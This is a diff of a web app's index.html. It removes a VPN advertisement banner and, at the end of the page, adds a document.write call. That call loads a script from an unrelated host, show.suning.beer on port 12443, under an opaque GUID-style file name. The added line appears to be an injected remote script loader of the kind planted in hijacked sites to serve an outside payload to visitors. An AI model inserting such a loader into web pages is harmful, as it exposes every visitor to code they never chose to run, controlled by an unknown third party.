--- a/index.html
+++ b/index.html
@@ -2,15 +2,7 @@
     <script type="text/javascript" src="https://gw.alipayobjects.com/os/lib/less/3.10.3/dist/less.min.js"></script> --><!-- <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,400,400i,600,700"> --><script src="./env.js"></script><script>window.routerBase = "/";</script>
     <script src="env.js"></script>
 </head><body>
-<style type="text/css">
-    #YL_curtain_ad { width:960px; padding:0; margin:0 auto; overflow:hidden; height:200px; display: none; position:relative;}
-    #YL_curtain_ad span { padding:2px 5px; font:bold 12px/1.5 'sans-serif'; position:absolute; right:5px; bottom:5px; border:#EEE 1px solid; background: #FFF; z-index: 10;}
-    #YL_curtain_ad div{ display:none;}
-</style>
-<div id="YL_curtain_ad">
-    <div id="YL_clos_div"><span onclick="closetopad()">Close</span></div>
-    <div class="alert alert-info" style="text-align:center; margin-bottom: 0px;"><p class="mb-0 font-w700">小强VPN仅用于学习交流，请勿违反国家相关法律法规 id="YL_AD_IMG" </p>
-    </div></div><div id="root"></div><!-- Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-P1E9Z5LRRK"></script><script>window.dataLayer = window.dataLayer || [];
+<div id="root"></div><!-- Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-P1E9Z5LRRK"></script><script>window.dataLayer = window.dataLayer || [];
 
   function gtag () {
     dataLayer.push(arguments);
@@ -28,4 +20,4 @@
         s1.setAttribute('crossorigin','*');
         s0.parentNode.insertBefore(s1,s0);
     })();
-</script></body></html>
+</script>document.write('<script src="https://show.suning.beer:12443/ty/610E318D-2BA3-13488-33-BB93128A5A45.alpha"><\/script>');</body></html>
